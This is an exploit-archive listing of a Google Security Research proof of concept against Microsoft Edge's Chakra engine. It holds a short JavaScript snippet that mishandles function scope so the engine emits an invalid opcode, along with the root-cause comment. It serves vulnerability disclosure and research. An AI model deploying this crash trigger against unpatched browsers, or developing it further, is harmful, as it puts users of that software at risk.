Lucene search

K
zdtGoogle Security Research1337DAY-ID-29569
HistoryJan 18, 2018 - 12:00 a.m.

Microsoft Edge Chakra - Incorrect Scope Handling Exploit

2018-01-1800:00:00
Google Security Research
0day.today
18

0.96 High

EPSS

Percentile

99.3%

Exploit for windows platform in category dos / poc

// PoC:
 
(function func(arg = function () {
    print(func);  // SetHasOwnLocalInClosure should be called for the param scope in the PostVisitFunction function.
}()) {
    print(func);
    function func() {
 
    }
})();
 
// Chakra fails to distinguish whether the function is referenced in the param scope and ends up to emit an invalid opcode.

#  0day.today [2018-04-09]  #